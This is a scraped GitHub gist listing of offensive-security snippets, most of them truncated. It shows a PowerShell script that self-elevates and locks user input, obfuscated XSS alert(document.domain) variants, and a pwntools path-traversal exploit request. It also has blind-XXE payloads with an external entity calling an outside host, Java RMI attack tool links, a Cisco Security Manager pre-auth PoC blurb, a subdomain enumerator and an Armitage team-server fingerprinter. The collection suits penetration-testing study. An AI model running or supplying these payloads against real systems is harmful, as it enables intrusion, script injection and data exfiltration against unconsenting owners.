search?query=X-Blackboard-product%3A+Blackboard+Learn
| Application | CVE | Infos | Port |
|---|---|---|---|
| APACHE CASSANDRA 3.8 / ZooKEEPER | CVE-2018-8016 | LINK | 7199 |
| NI |
Nicolas Krassas dinosn
dinosn
/ lock_input.ps1
Created
March 1, 2023 15:10
— forked from atao/lock_input.ps1
Lock keyboard and mouse during n seconds.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Run As Administrator | |
| if (!([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { Start-Process powershell.exe "-NoProfile -ExecutionPolicy Bypass -File `"$PSCommandPath`"" -Verb RunAs; exit } | |
| $code = @" | |
| [DllImport("user32.dll")] | |
| public static extern bool BlockInput(bool fBlockIt); | |
| "@ | |
| $userInput = Add-Type -MemberDefinition $code -Name UserInput -Namespace UserInput -PassThru |
dinosn
/ alert.js
Created
June 19, 2021 11:45
— forked from tomnomnom/alert.js
Ways to alert(document.domain)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // How many ways can you alert(document.domain)? | |
| // Comment with more ways and I'll add them :) | |
| // I already know about the JSFuck way, but it's too long to add (: | |
| // Direct invocation | |
| alert(document.domain); | |
| (alert)(document.domain); | |
| al\u0065rt(document.domain); | |
| al\u{65}rt(document.domain); | |
| window['alert'](document.domain); |
dinosn
/ Java RMI attacks and tools
Created
April 18, 2021 13:26
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Java RMI tools | |
| https://github.com/BishopFox/rmiscout | |
| https://github.com/qtc-de/remote-method-guesser | |
| https://github.com/mogwailabs/mjet | |
| https://github.com/NickstaDB/BaRMIe |
dinosn
/ CSM_pocs.md
Created
November 17, 2020 16:56
— forked from Frycos/CSM_pocs.md
Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently-from small networks to large networks consisting of hundreds of devices.
Several pre-auth vulnerabilities were submitted to Cisco on 2020-07-13 and (according to Cisco) patched in version 4.22 on 2020-11-10. Release notes didn't state anything about the vulnerabilities, security advisories were not published. All payload are processed in the context of NT AUTHORITY\SYSTEM.
dinosn
/ gist:d3f3d96a4f18ae6dbecbd1094cf3f68e
Created
May 12, 2020 08:04
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| def encode(string): | |
| return "".join("%{0:0>2}".format(format(ord(char), "x")) for char in string) | |
| def genrequest(payload): | |
| request = "%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/proc/sys/kernel/randomize_va_space%x00%61%61%61%61%61%61%61%61%62%61%61%61%61%61%61%61%63%61%61%61%61%61%61%61%64%61%61%61%61%61%61%61%65%61%61%61%61%61%61%61%66%61%61%61%61%61%61%61%67%61%61%61%61%61%61%61%68%61%61%61%61%61%61%61%69%61%61%61%61%61%61%61%6a%61%61%61%61%61%61%61%6b%61%61%61%61%61%61%61%6c%61%61%61%61%61%61%61%6d%61%61%61%61%61%61%61%6e%00{}".format(encode(payload)) | |
| print (request) | |
| request = "CHECK /{} LFM\r\nUser={}\r\nPassword={}\r\n\r\n{}\n".format(request, username, password, hash) | |
| return request |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # Crude and slow enumeration for peculiar domains. | |
| # use with python enum.py -i names.txt -o out.txt -d \-\-pre.domain.name | |
| # can be used to enumerate preprod domains on salesforce.com which are in the form of --preprod.my.salesforce.com | |
| # get the names.txt from https://raw.githubusercontent.com/blechschmidt/massdns/master/lists/names.txt , part of massdns. | |
| # | |
| import sys,getopt,socket | |
dinosn
/ XXE_payloads
Created
August 7, 2017 04:13
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
dinosn
/ rATSfinger
Created
January 26, 2016 19:25
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rATSfinger – Fingerprinting Remote Armitage Team Servers | |
| ((( obscure channel ))) by x4zx / 28d // keep unread // hide // preview | |
| Copy link to clipboard | |
| Checks for a static string of control characters (^U^C^A^@^B^B) within a “ghost file”. When issuing a get request for a non-existent file (ghost file) to the server port over HTTP, we receieve a file containing non-readable control characters. We can use the control characters in the file to fingerprint the team server. | |
| usage: python rATSfinger.py ip:port | |
| #!/usr/bin/env python |